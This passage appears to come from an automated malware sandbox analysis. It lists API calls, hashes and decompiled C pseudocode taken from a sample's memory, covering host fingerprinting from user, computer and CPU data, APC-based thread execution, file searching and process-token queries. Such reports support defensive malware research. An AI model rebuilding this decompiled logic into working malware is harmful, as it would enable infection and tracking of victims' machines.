                                                                                                                                                                                                    0x04f652f5
                                                                                                                                                                                                    0x04f652fb
                                                                                                                                                                                                    0x04f65305
                                                                                                                                                                                                    0x04f6530c
                                                                                                                                                                                                    0x04f6530c
                                                                                                                                                                                                    0x04f6531e
                                                                                                                                                                                                    0x04f65329
                                                                                                                                                                                                    0x04f65337
                                                                                                                                                                                                    0x04f6533c
                                                                                                                                                                                                    0x04f65341
                                                                                                                                                                                                    0x04f65344
                                                                                                                                                                                                    0x04f65349
                                                                                                                                                                                                    0x04f65353
                                                                                                                                                                                                    0x04f65356
                                                                                                                                                                                                    0x04f65359
                                                                                                                                                                                                    0x04f6536f
                                                                                                                                                                                                    0x04f65371
                                                                                                                                                                                                    0x04f65376
                                                                                                                                                                                                    0x04f654c1
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x04f654c1
                                                                                                                                                                                                    0x04f6538d
                                                                                                                                                                                                    0x04f653de
                                                                                                                                                                                                    0x04f653a1
                                                                                                                                                                                                    0x04f653a9
                                                                                                                                                                                                    0x04f653ae
                                                                                                                                                                                                    0x04f653bc
                                                                                                                                                                                                    0x04f653c5
                                                                                                                                                                                                    0x04f653ce
                                                                                                                                                                                                    0x04f653ce
                                                                                                                                                                                                    0x04f653dc
                                                                                                                                                                                                    0x04f653dc
                                                                                                                                                                                                    0x04f653e2
                                                                                                                                                                                                    0x04f653e6
                                                                                                                                                                                                    0x04f653e6
                                                                                                                                                                                                    0x04f653ec
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x04f653ee
                                                                                                                                                                                                    0x04f653f4
                                                                                                                                                                                                    0x04f6549b
                                                                                                                                                                                                    0x04f6549e
                                                                                                                                                                                                    0x04f654ab
                                                                                                                                                                                                    0x04f654ab
                                                                                                                                                                                                    0x04f654af
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x04f654a4
                                                                                                                                                                                                    0x04f654a8
                                                                                                                                                                                                    0x04f654a8
                                                                                                                                                                                                    0x04f654aa
                                                                                                                                                                                                    0x04f654aa
                                                                                                                                                                                                    0x04f654b4
                                                                                                                                                                                                    0x04f654bb
                                                                                                                                                                                                    0x04f654bd
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x04f654bd
                                                                                                                                                                                                    0x04f653fa
                                                                                                                                                                                                    0x04f653fc
                                                                                                                                                                                                    0x04f653fc
                                                                                                                                                                                                    0x04f6540f
                                                                                                                                                                                                    0x04f65415
                                                                                                                                                                                                    0x04f65420
                                                                                                                                                                                                    0x04f65422
                                                                                                                                                                                                    0x04f65426
                                                                                                                                                                                                    0x04f65428
                                                                                                                                                                                                    0x04f65428
                                                                                                                                                                                                    0x04f6542d
                                                                                                                                                                                                    0x04f6542f
                                                                                                                                                                                                    0x04f6542f
                                                                                                                                                                                                    0x04f6542d
                                                                                                                                                                                                    0x04f65434
                                                                                                                                                                                                    0x04f65438
                                                                                                                                                                                                    0x04f65438
                                                                                                                                                                                                    0x04f65448
                                                                                                                                                                                                    0x04f6544d
                                                                                                                                                                                                    0x04f65450
                                                                                                                                                                                                    0x04f65450
                                                                                                                                                                                                    0x04f65453
                                                                                                                                                                                                    0x04f6545d
                                                                                                                                                                                                    0x04f65465
                                                                                                                                                                                                    0x04f6546a
                                                                                                                                                                                                    0x04f65478
                                                                                                                                                                                                    0x04f65478
                                                                                                                                                                                                    0x04f6548c
                                                                                                                                                                                                    0x04f65490
                                                                                                                                                                                                    0x04f65490

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,63699BC3,00000000), ref: 04F65267
                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,63699BC3), ref: 04F65289
                                                                                                                                                                                                    • memset.NTDLL ref: 04F652A3
                                                                                                                                                                                                      • Part of subcall function 04F627B6: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,04F65073,63699BCE,04F652BC,73797325), ref: 04F627C7
                                                                                                                                                                                                      • Part of subcall function 04F627B6: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 04F627E1
                                                                                                                                                                                                    • CreateFileA.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 04F652E1
                                                                                                                                                                                                    • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 04F652F5
                                                                                                                                                                                                    • FindCloseChangeNotification.KERNELBASE(00000000), ref: 04F6530C
                                                                                                                                                                                                    • StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 04F65318
                                                                                                                                                                                                    • lstrcat.KERNEL32(?,642E2A5C), ref: 04F65359
                                                                                                                                                                                                    • FindFirstFileA.KERNELBASE(?,?), ref: 04F6536F
                                                                                                                                                                                                    • CompareFileTime.KERNEL32(?,?), ref: 04F6538D
                                                                                                                                                                                                    • FindNextFileA.KERNELBASE(04F6568F,?), ref: 04F653A1
                                                                                                                                                                                                    • FindClose.KERNEL32(04F6568F), ref: 04F653AE
                                                                                                                                                                                                    • FindFirstFileA.KERNEL32(?,?), ref: 04F653BA
                                                                                                                                                                                                    • CompareFileTime.KERNEL32(?,?), ref: 04F653DC
                                                                                                                                                                                                    • StrChrA.SHLWAPI(?,0000002E), ref: 04F6540F
                                                                                                                                                                                                    • memcpy.NTDLL(00000000,?,00000000), ref: 04F65448
                                                                                                                                                                                                    • FindNextFileA.KERNELBASE(04F6568F,?), ref: 04F6545D
                                                                                                                                                                                                    • FindClose.KERNEL32(04F6568F), ref: 04F6546A
                                                                                                                                                                                                    • FindFirstFileA.KERNEL32(?,?), ref: 04F65476
                                                                                                                                                                                                    • CompareFileTime.KERNEL32(?,?), ref: 04F65486
                                                                                                                                                                                                    • FindClose.KERNELBASE(04F6568F), ref: 04F654BB
                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,00000000,73797325), ref: 04F654CD
                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,?), ref: 04F654DD
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.627661838.0000000004F61000.00000020.00000001.sdmp, Offset: 04F60000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.627625918.0000000004F60000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627709489.0000000004F6C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627740399.0000000004F6D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627760603.0000000004F6F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: File$Find$CloseHeapTime$CompareFirst$AllocateEnvironmentExpandFreeNextStrings$ChangeCreateNotificationlstrcatmemcpymemset
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2944988578-0
                                                                                                                                                                                                    • Opcode ID: 7e4049104a0150383069b9c14ccaa762b16d74fe29ab28717dae631a8a193872
                                                                                                                                                                                                    • Instruction ID: e40c61b650fac5bb80f3275b3b1c8b292badab4fb2f230e62616caecdb87759d
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7e4049104a0150383069b9c14ccaa762b16d74fe29ab28717dae631a8a193872
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 15815972D00119EFDB109FA5EC84AEEBBB9EF44301F1041AAE556E7250E774AA45CB60
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 84%
                                                                                                                                                                                                    			E004019C7(void* __edi, long _a4) {
                                                                                                                                                                                                    				long _v8;
                                                                                                                                                                                                    				struct _SYSTEMTIME _v24;
                                                                                                                                                                                                    				void* _v48;
                                                                                                                                                                                                    				long _t25;
                                                                                                                                                                                                    				int _t27;
                                                                                                                                                                                                    				long _t30;
                                                                                                                                                                                                    				long _t31;
                                                                                                                                                                                                    				void* _t32;
                                                                                                                                                                                                    				long _t35;
                                                                                                                                                                                                    				long _t36;
                                                                                                                                                                                                    				long _t40;
                                                                                                                                                                                                    				void* _t45;
                                                                                                                                                                                                    				intOrPtr _t48;
                                                                                                                                                                                                    				signed int _t53;
                                                                                                                                                                                                    				void* _t58;
                                                                                                                                                                                                    				signed int _t61;
                                                                                                                                                                                                    				void* _t64;
                                                                                                                                                                                                    				intOrPtr* _t65;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t25 = E00401799();
                                                                                                                                                                                                    				_v8 = _t25;
                                                                                                                                                                                                    				if(_t25 != 0) {
                                                                                                                                                                                                    					return _t25;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				do {
                                                                                                                                                                                                    					GetSystemTime( &_v24);
                                                                                                                                                                                                    					_t27 = SwitchToThread();
                                                                                                                                                                                                    					asm("cdq");
                                                                                                                                                                                                    					_t53 = 9;
                                                                                                                                                                                                    					_t61 = _t27 + (_v24.wMilliseconds & 0x0000ffff) % _t53;
                                                                                                                                                                                                    					_t30 = E0040167E(__edi, _t61); // executed
                                                                                                                                                                                                    					_v8 = _t30;
                                                                                                                                                                                                    					Sleep(_t61 << 5); // executed
                                                                                                                                                                                                    					_t31 = _v8;
                                                                                                                                                                                                    				} while (_t31 == 0xc);
                                                                                                                                                                                                    				if(_t31 != 0) {
                                                                                                                                                                                                    					L21:
                                                                                                                                                                                                    					return _t31;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_push(__edi);
                                                                                                                                                                                                    				if(_a4 != 0) {
                                                                                                                                                                                                    					L11:
                                                                                                                                                                                                    					_t32 = CreateThread(0, 0, __imp__SleepEx,  *0x404140, 0, 0); // executed
                                                                                                                                                                                                    					_t64 = _t32;
                                                                                                                                                                                                    					if(_t64 == 0) {
                                                                                                                                                                                                    						L18:
                                                                                                                                                                                                    						_v8 = GetLastError();
                                                                                                                                                                                                    						L19:
                                                                                                                                                                                                    						_t31 = _v8;
                                                                                                                                                                                                    						if(_t31 == 0xffffffff) {
                                                                                                                                                                                                    							_t31 = GetLastError();
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						goto L21;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_t35 = QueueUserAPC(E0040133E, _t64,  &_v48); // executed
                                                                                                                                                                                                    					if(_t35 == 0) {
                                                                                                                                                                                                    						_t40 = GetLastError();
                                                                                                                                                                                                    						_a4 = _t40;
                                                                                                                                                                                                    						TerminateThread(_t64, _t40);
                                                                                                                                                                                                    						CloseHandle(_t64);
                                                                                                                                                                                                    						_t64 = 0;
                                                                                                                                                                                                    						SetLastError(_a4);
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					if(_t64 == 0) {
                                                                                                                                                                                                    						goto L18;
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						_t36 = WaitForSingleObject(_t64, 0xffffffff);
                                                                                                                                                                                                    						_v8 = _t36;
                                                                                                                                                                                                    						if(_t36 == 0) {
                                                                                                                                                                                                    							GetExitCodeThread(_t64,  &_v8);
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						CloseHandle(_t64);
                                                                                                                                                                                                    						goto L19;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				if(E00401C6E(_t53,  &_a4) != 0) {
                                                                                                                                                                                                    					 *0x404138 = 0;
                                                                                                                                                                                                    					goto L11;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t65 = __imp__GetLongPathNameW;
                                                                                                                                                                                                    				_t45 =  *_t65(_a4, 0, 0); // executed
                                                                                                                                                                                                    				_t58 = _t45;
                                                                                                                                                                                                    				if(_t58 == 0) {
                                                                                                                                                                                                    					L9:
                                                                                                                                                                                                    					 *0x404138 = _a4;
                                                                                                                                                                                                    					goto L11;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t14 = _t58 + 2; // 0x2
                                                                                                                                                                                                    				_t48 = E00401669(_t58 + _t14);
                                                                                                                                                                                                    				 *0x404138 = _t48;
                                                                                                                                                                                                    				if(_t48 == 0) {
                                                                                                                                                                                                    					goto L9;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				 *_t65(_a4, _t48, _t58); // executed
                                                                                                                                                                                                    				E00401E78(_a4);
                                                                                                                                                                                                    				goto L11;
                                                                                                                                                                                                    			}





















                                                                                                                                                                                                    0x004019ce
                                                                                                                                                                                                    0x004019d5
                                                                                                                                                                                                    0x004019da
                                                                                                                                                                                                    0x00401b0a
                                                                                                                                                                                                    0x00401b0a
                                                                                                                                                                                                    0x004019e1
                                                                                                                                                                                                    0x004019e5
                                                                                                                                                                                                    0x004019eb
                                                                                                                                                                                                    0x004019f9
                                                                                                                                                                                                    0x004019fa
                                                                                                                                                                                                    0x004019fd
                                                                                                                                                                                                    0x00401a00
                                                                                                                                                                                                    0x00401a09
                                                                                                                                                                                                    0x00401a0c
                                                                                                                                                                                                    0x00401a12
                                                                                                                                                                                                    0x00401a15
                                                                                                                                                                                                    0x00401a1c
                                                                                                                                                                                                    0x00401b07
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00401b07
                                                                                                                                                                                                    0x00401a22
                                                                                                                                                                                                    0x00401a26
                                                                                                                                                                                                    0x00401a7c
                                                                                                                                                                                                    0x00401a8c
                                                                                                                                                                                                    0x00401a92
                                                                                                                                                                                                    0x00401a9c
                                                                                                                                                                                                    0x00401af7
                                                                                                                                                                                                    0x00401af9
                                                                                                                                                                                                    0x00401afc
                                                                                                                                                                                                    0x00401afc
                                                                                                                                                                                                    0x00401b03
                                                                                                                                                                                                    0x00401b05
                                                                                                                                                                                                    0x00401b05
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00401b03
                                                                                                                                                                                                    0x00401aa8
                                                                                                                                                                                                    0x00401ab6
                                                                                                                                                                                                    0x00401ab8
                                                                                                                                                                                                    0x00401abc
                                                                                                                                                                                                    0x00401abf
                                                                                                                                                                                                    0x00401ac6
                                                                                                                                                                                                    0x00401acb
                                                                                                                                                                                                    0x00401acd
                                                                                                                                                                                                    0x00401acd
                                                                                                                                                                                                    0x00401ad5
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00401ad7
                                                                                                                                                                                                    0x00401ada
                                                                                                                                                                                                    0x00401ae0
                                                                                                                                                                                                    0x00401ae5
                                                                                                                                                                                                    0x00401aec
                                                                                                                                                                                                    0x00401aec
                                                                                                                                                                                                    0x00401af3
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00401af3
                                                                                                                                                                                                    0x00401ad5
                                                                                                                                                                                                    0x00401a33
                                                                                                                                                                                                    0x00401a76
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00401a76
                                                                                                                                                                                                    0x00401a35
                                                                                                                                                                                                    0x00401a40
                                                                                                                                                                                                    0x00401a42
                                                                                                                                                                                                    0x00401a46
                                                                                                                                                                                                    0x00401a6c
                                                                                                                                                                                                    0x00401a6f
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00401a6f
                                                                                                                                                                                                    0x00401a48
                                                                                                                                                                                                    0x00401a4d
                                                                                                                                                                                                    0x00401a52
                                                                                                                                                                                                    0x00401a59
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00401a60
                                                                                                                                                                                                    0x00401a65
                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 00401799: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,004019D3), ref: 004017A8
                                                                                                                                                                                                      • Part of subcall function 00401799: GetVersion.KERNEL32(?,004019D3), ref: 004017B7
                                                                                                                                                                                                      • Part of subcall function 00401799: GetCurrentProcessId.KERNEL32(?,004019D3), ref: 004017D3
                                                                                                                                                                                                      • Part of subcall function 00401799: OpenProcess.KERNEL32(0010047A,00000000,00000000,?,004019D3), ref: 004017EC
                                                                                                                                                                                                    • GetSystemTime.KERNEL32(?), ref: 004019E5
                                                                                                                                                                                                    • SwitchToThread.KERNEL32 ref: 004019EB
                                                                                                                                                                                                      • Part of subcall function 0040167E: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,00000000,00401A05,?,00000000,?,?,?,?,?,?,?,00401A05), ref: 004016D4
                                                                                                                                                                                                      • Part of subcall function 0040167E: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,00401A05,00000000), ref: 00401766
                                                                                                                                                                                                      • Part of subcall function 0040167E: VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?,?,?,?,?,00401A05), ref: 00401781
                                                                                                                                                                                                    • Sleep.KERNELBASE(00000000,00000000), ref: 00401A0C
                                                                                                                                                                                                    • GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 00401A40
                                                                                                                                                                                                    • GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 00401A60
                                                                                                                                                                                                    • CreateThread.KERNELBASE(00000000,00000000,00000000,00000000,?), ref: 00401A8C
                                                                                                                                                                                                    • QueueUserAPC.KERNELBASE(0040133E,00000000,?), ref: 00401AA8
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00401AB8
                                                                                                                                                                                                    • TerminateThread.KERNEL32(00000000,00000000), ref: 00401ABF
                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00401AC6
                                                                                                                                                                                                    • SetLastError.KERNEL32(?), ref: 00401ACD
                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00401ADA
                                                                                                                                                                                                    • GetExitCodeThread.KERNEL32(00000000,?), ref: 00401AEC
                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00401AF3
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00401AF7
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00401B05
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.622657691.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.622723835.0000000000405000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ErrorLastThread$CloseCreateHandleLongNamePathProcessVirtual$AllocCodeCurrentEventExitFreeObjectOpenQueueSingleSleepSwitchSystemTerminateTimeUserVersionWaitmemcpy
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2478182988-0
                                                                                                                                                                                                    • Opcode ID: 323b6c95d677037604f7bd0762eb04f8c4f6edab8aefc122769d1c0695dceb25
                                                                                                                                                                                                    • Instruction ID: dfcb71a45e3eea8120b8b7c03f182393c4dfed06a5e8c76d3e2b89538cb3a77d
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 323b6c95d677037604f7bd0762eb04f8c4f6edab8aefc122769d1c0695dceb25
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 51317171902114BFDB10EFB5DD88CAF7AACEB083557104536F905F22A4E7389E419BA8
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 96%
                                                                                                                                                                                                    			E04F65DC6(char __eax, void* __esi) {
                                                                                                                                                                                                    				long _v8;
                                                                                                                                                                                                    				char _v12;
                                                                                                                                                                                                    				signed int _v16;
                                                                                                                                                                                                    				signed int _v20;
                                                                                                                                                                                                    				signed int _v28;
                                                                                                                                                                                                    				long _t34;
                                                                                                                                                                                                    				signed int _t39;
                                                                                                                                                                                                    				long _t50;
                                                                                                                                                                                                    				char _t59;
                                                                                                                                                                                                    				intOrPtr _t61;
                                                                                                                                                                                                    				void* _t62;
                                                                                                                                                                                                    				void* _t64;
                                                                                                                                                                                                    				char _t65;
                                                                                                                                                                                                    				intOrPtr* _t67;
                                                                                                                                                                                                    				void* _t68;
                                                                                                                                                                                                    				void* _t69;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t69 = __esi;
                                                                                                                                                                                                    				_t65 = __eax;
                                                                                                                                                                                                    				_v8 = 0;
                                                                                                                                                                                                    				_v12 = __eax;
                                                                                                                                                                                                    				if(__eax == 0) {
                                                                                                                                                                                                    					_t59 =  *0x4f6d270; // 0xd448b889
                                                                                                                                                                                                    					_v12 = _t59;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t64 = _t69;
                                                                                                                                                                                                    				E04F660BE( &_v12, _t64);
                                                                                                                                                                                                    				if(_t65 != 0) {
                                                                                                                                                                                                    					 *_t69 =  *_t69 ^  *0x4f6d2a0 ^ 0x4c0ca0ae;
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					GetUserNameW(0,  &_v8); // executed
                                                                                                                                                                                                    					_t50 = _v8;
                                                                                                                                                                                                    					if(_t50 != 0) {
                                                                                                                                                                                                    						_t62 = RtlAllocateHeap( *0x4f6d238, 0, _t50 + _t50);
                                                                                                                                                                                                    						if(_t62 != 0) {
                                                                                                                                                                                                    							if(GetUserNameW(_t62,  &_v8) != 0) {
                                                                                                                                                                                                    								_t64 = _t62;
                                                                                                                                                                                                    								 *_t69 =  *_t69 ^ E04F64D95(_v8 + _v8, _t64);
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							HeapFree( *0x4f6d238, 0, _t62);
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t61 = __imp__;
                                                                                                                                                                                                    				_v8 = _v8 & 0x00000000;
                                                                                                                                                                                                    				GetComputerNameW(0,  &_v8);
                                                                                                                                                                                                    				_t34 = _v8;
                                                                                                                                                                                                    				if(_t34 != 0) {
                                                                                                                                                                                                    					_t68 = RtlAllocateHeap( *0x4f6d238, 0, _t34 + _t34);
                                                                                                                                                                                                    					if(_t68 != 0) {
                                                                                                                                                                                                    						if(GetComputerNameW(_t68,  &_v8) != 0) {
                                                                                                                                                                                                    							_t64 = _t68;
                                                                                                                                                                                                    							 *(_t69 + 0xc) =  *(_t69 + 0xc) ^ E04F64D95(_v8 + _v8, _t64);
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						HeapFree( *0x4f6d238, 0, _t68);
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				asm("cpuid");
                                                                                                                                                                                                    				_t67 =  &_v28;
                                                                                                                                                                                                    				 *_t67 = 1;
                                                                                                                                                                                                    				 *((intOrPtr*)(_t67 + 4)) = _t61;
                                                                                                                                                                                                    				 *((intOrPtr*)(_t67 + 8)) = 0;
                                                                                                                                                                                                    				 *(_t67 + 0xc) = _t64;
                                                                                                                                                                                                    				_t39 = _v16 ^ _v20 ^ _v28;
                                                                                                                                                                                                    				 *(_t69 + 4) =  *(_t69 + 4) ^ _t39;
                                                                                                                                                                                                    				return _t39;
                                                                                                                                                                                                    			}



















                                                                                                                                                                                                    0x04f65dc6
                                                                                                                                                                                                    0x04f65dce
                                                                                                                                                                                                    0x04f65dd2
                                                                                                                                                                                                    0x04f65dd5
                                                                                                                                                                                                    0x04f65dda
                                                                                                                                                                                                    0x04f65ddc
                                                                                                                                                                                                    0x04f65de1
                                                                                                                                                                                                    0x04f65de1
                                                                                                                                                                                                    0x04f65de7
                                                                                                                                                                                                    0x04f65de9
                                                                                                                                                                                                    0x04f65df6
                                                                                                                                                                                                    0x04f65e57
                                                                                                                                                                                                    0x04f65df8
                                                                                                                                                                                                    0x04f65dfd
                                                                                                                                                                                                    0x04f65e03
                                                                                                                                                                                                    0x04f65e08
                                                                                                                                                                                                    0x04f65e16
                                                                                                                                                                                                    0x04f65e1a
                                                                                                                                                                                                    0x04f65e29
                                                                                                                                                                                                    0x04f65e30
                                                                                                                                                                                                    0x04f65e37
                                                                                                                                                                                                    0x04f65e37
                                                                                                                                                                                                    0x04f65e42
                                                                                                                                                                                                    0x04f65e42
                                                                                                                                                                                                    0x04f65e1a
                                                                                                                                                                                                    0x04f65e08
                                                                                                                                                                                                    0x04f65e59
                                                                                                                                                                                                    0x04f65e5f
                                                                                                                                                                                                    0x04f65e69
                                                                                                                                                                                                    0x04f65e6b
                                                                                                                                                                                                    0x04f65e70
                                                                                                                                                                                                    0x04f65e7f
                                                                                                                                                                                                    0x04f65e83
                                                                                                                                                                                                    0x04f65e8e
                                                                                                                                                                                                    0x04f65e95
                                                                                                                                                                                                    0x04f65e9c
                                                                                                                                                                                                    0x04f65e9c
                                                                                                                                                                                                    0x04f65ea8
                                                                                                                                                                                                    0x04f65ea8
                                                                                                                                                                                                    0x04f65e83
                                                                                                                                                                                                    0x04f65eb3
                                                                                                                                                                                                    0x04f65eb5
                                                                                                                                                                                                    0x04f65eb8
                                                                                                                                                                                                    0x04f65eba
                                                                                                                                                                                                    0x04f65ebd
                                                                                                                                                                                                    0x04f65ec0
                                                                                                                                                                                                    0x04f65eca
                                                                                                                                                                                                    0x04f65ece
                                                                                                                                                                                                    0x04f65ed2

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetUserNameW.ADVAPI32(00000000,?), ref: 04F65DFD
                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,?), ref: 04F65E14
                                                                                                                                                                                                    • GetUserNameW.ADVAPI32(00000000,?), ref: 04F65E21
                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,04F65063), ref: 04F65E42
                                                                                                                                                                                                    • GetComputerNameW.KERNEL32(00000000,00000000), ref: 04F65E69
                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 04F65E7D
                                                                                                                                                                                                    • GetComputerNameW.KERNEL32(00000000,00000000), ref: 04F65E8A
                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,04F65063), ref: 04F65EA8
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.627661838.0000000004F61000.00000020.00000001.sdmp, Offset: 04F60000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.627625918.0000000004F60000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627709489.0000000004F6C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627740399.0000000004F6D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627760603.0000000004F6F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: HeapName$AllocateComputerFreeUser
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3239747167-0
                                                                                                                                                                                                    • Opcode ID: 377b0cc3c33a45673fa9d93dc5dc454c313d218b5573c736f31485aeab112c46
                                                                                                                                                                                                    • Instruction ID: de5f245436e28398c6e60fbdc0cd8cf91cca9fd6712a7b68d5ee6dfcb4409af9
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 377b0cc3c33a45673fa9d93dc5dc454c313d218b5573c736f31485aeab112c46
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9E31F972A00209FFEB10DFA9EC81A6EB7F9EF58700F114469E556E7214DB34EE029B10
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 38%
                                                                                                                                                                                                    			E04F69932(char _a4, void* _a8) {
                                                                                                                                                                                                    				void* _v8;
                                                                                                                                                                                                    				void* _v12;
                                                                                                                                                                                                    				char _v16;
                                                                                                                                                                                                    				void* _v20;
                                                                                                                                                                                                    				char _v24;
                                                                                                                                                                                                    				char _v28;
                                                                                                                                                                                                    				char _v32;
                                                                                                                                                                                                    				char _v36;
                                                                                                                                                                                                    				char _v40;
                                                                                                                                                                                                    				void* _v44;
                                                                                                                                                                                                    				void** _t33;
                                                                                                                                                                                                    				void* _t40;
                                                                                                                                                                                                    				void* _t43;
                                                                                                                                                                                                    				void** _t44;
                                                                                                                                                                                                    				intOrPtr* _t47;
                                                                                                                                                                                                    				char _t48;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                    				_v20 = _a4;
                                                                                                                                                                                                    				_t48 = 0;
                                                                                                                                                                                                    				_v16 = 0;
                                                                                                                                                                                                    				_a4 = 0;
                                                                                                                                                                                                    				_v44 = 0x18;
                                                                                                                                                                                                    				_v40 = 0;
                                                                                                                                                                                                    				_v32 = 0;
                                                                                                                                                                                                    				_v36 = 0;
                                                                                                                                                                                                    				_v28 = 0;
                                                                                                                                                                                                    				_v24 = 0;
                                                                                                                                                                                                    				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
                                                                                                                                                                                                    					_t33 =  &_v8;
                                                                                                                                                                                                    					__imp__(_v12, 8, _t33);
                                                                                                                                                                                                    					if(_t33 >= 0) {
                                                                                                                                                                                                    						_t47 = __imp__;
                                                                                                                                                                                                    						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
                                                                                                                                                                                                    						_t44 = E04F68D59(_a4);
                                                                                                                                                                                                    						if(_t44 != 0) {
                                                                                                                                                                                                    							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
                                                                                                                                                                                                    							if(_t40 >= 0) {
                                                                                                                                                                                                    								memcpy(_a8,  *_t44, 0x1c);
                                                                                                                                                                                                    								_t48 = 1;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							E04F6677C(_t44);
                                                                                                                                                                                                    						}
